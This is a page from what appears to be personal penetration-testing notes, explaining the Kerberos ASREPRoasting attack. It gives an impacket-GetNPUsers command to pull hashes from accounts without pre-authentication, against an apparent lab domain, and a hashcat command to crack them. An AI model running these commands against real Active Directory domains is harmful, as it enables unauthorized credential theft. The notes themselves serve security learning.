Cyber Security Notes

ASREPRoasting

Cyber Security Notes

Index
Attacking Web Applications
Attacking Web Applications
Binary Exploitation
Binary Exploitation
- How to use GDB
Cryptography
Cryptography
- Pretty Good Privacy (PGP)
- Asymmetric Encryption
  Asymmetric Encryption
  - RSA
    RSA
    
    RSA Attacks
    
    RSA Basics
- Symetric Encryption
  Symetric Encryption
  - AES
    AES
    
    AES Basics
General Pentesting
General Pentesting
- Data Exfiltration
- Miscellaneous Tools
- Miscellaneous Services
- Pivoting
- Port Scanning
- Password Attacks
  Password Attacks
  - Offline Password Attacks
  - Online Password Attacks
Miscellaneous
Miscellaneous
- Machine Learning & AI Attacks
  Machine Learning & AI Attacks
  - Creating Malicious Tensorflow Models
Pentesting Linux
Pentesting Linux
- Priviliage Escalation
- Linux - Stabilisation & Post Exploitation
Pentesting Windows
Pentesting Windows
- Creating Robust Reverse Shells
- Enumerating Windows
- Network Enumeration
- Windows - Stabilisation & Post Exploitation
- Windows Commands
- Windows Local Persistence
- Windows Privilage Escalation
- Windows Tools
- Active Directory
  Active Directory
  - Enumerating Users
  - Hashes & Tokens
    Hashes & Tokens
    
    ASREPRoasting ASREPRoasting
    Table of contents
    
    ASREPRoasting with GetNPUsers.py
    
    Dumping Hashes
  - Post Exploitation
    Post Exploitation
    
    Enumaration of Active Directory
  - Remote Management
    Remote Management
    
    evil-winrm
- Windows Services
  Windows Services
  - Pentesting MS-SQL
  - SMB Protocol
Reverse Engineering & Forensics
Reverse Engineering & Forensics
- Memory Analysis
  Memory Analysis
- Reversing Python
  Reversing Python
  - Decompile .elf & .exe Binaries.md

ASREPRoasting¶

Abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege "Does not require Pre-Authentication" set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

ASREPRoasting with GetNPUsers.py¶

GetNPUsers.py is a script that can be used to request Kerberos tickets without pre-authentication. This script is part of the impacket suite.

impacket-GetNPUsers -usersfile valid_users -dc-ip 10.10.125.64 -format hashcat -outputfile hashes.txt spookysec.local/

Once you have the hashes, you can crack them with hashcat.

hashcat -m 18200 -a 0 -o cracked.txt hashes.txt  /usr/share/wordlists/rockyou.txt